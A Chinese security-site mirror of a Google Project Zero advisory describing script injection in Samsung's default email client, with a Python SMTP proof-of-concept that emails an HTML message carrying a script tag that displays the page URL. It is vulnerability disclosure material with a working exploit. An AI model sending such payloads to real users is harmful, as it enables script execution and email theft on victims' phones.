首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Samsung SecEmailUI Script Injection
来源:https://code.google.com/p/google-security-research 作者: Google 发布时间:2015-10-29  
# Source: https://code.google.com/p/google-security-research/issues/detail?id=494
 
'''
The default Samsung email client's email viewer and composer (implemented in SecEmailUI.apk) doesn't sanitize HTML email content for scripts before rendering the data inside a WebView. This allows an attacker to execute arbitrary JavaScript when a user views a HTML email which contains HTML script tags or other events.
 
At the very least the JavaScript could exploit the attack surface provided within the WebView control. It might also be possible to access local file content or emails depending on the full configuration of the WebView, although this hasn't been tested fully.
 
This can also be exploited locally with the com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND intent which will include attacker controlled HTML in the sending email. If the final message was viewed it would be possible for the script to extract the original message from the Document object and potentially post that information to another server.
 
Attached is a simple SMTP client in Python to send an HTML message with script contents to the device. The "me", "you", "me_password" and "smtp_server" variables need to be changed to ones appropriate for the sending email account and the receiving account on the phone. When the resulting email is viewed it should display the URL of the page which is of the form email://M/N where M is the email account ID and N is the message ID which proves that the script code executed.
'''
 
#!/usr/bin/env python
 
import smtplib
 
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
 
# Change the details here appropriate to your configuration
me = "attacker@gmail.com"
me_password = "THIS IS NOT REAL"
you = "project.zero.test@gmail.com"
smtp_server = "smtp.gmail.com"
 
msg = MIMEMultipart('alternative')
msg['Subject'] = "Hello There!"
msg['From'] = me
msg['To'] = you
 
text = "Hello There!"
html = """\
<html>
  <head></head>
  <body>
   <p>
       <script>try { document.write(document.location); } catch(e) { document.write(e.message); }</script>
    </p>
  </body>
</html>
"""
 
part1 = MIMEText(text, 'plain')
part2 = MIMEText(html, 'html')
 
msg.attach(part1)
msg.attach(part2)
 
s = smtplib.SMTP_SSL(smtp_server)
s.login(me, me_password)
s.sendmail(me, you, msg.as_string())
s.quit()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mac OS X 10.9.5 / 10.10.5 rsh/
·Sam Spade 1.14 - Scan From IP
·Th3 MMA mma.php Backdoor Arbit
·NetUSB Kernel Stack Buffer Ove
·MacOS X 10.11 Hardlink Resourc
·AIX 7.1 - lquerylv Local Privi
·MacOS X 10.11 FTS Buffer Overf
·Gold MP4 Player - .swf Local E
·Winamp Bento Browser Remote Co
·Python 2.7 hotshot Module - pa
·Microsoft Compiled HTML Help R
·Python 2.7 array.fromstring Me
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved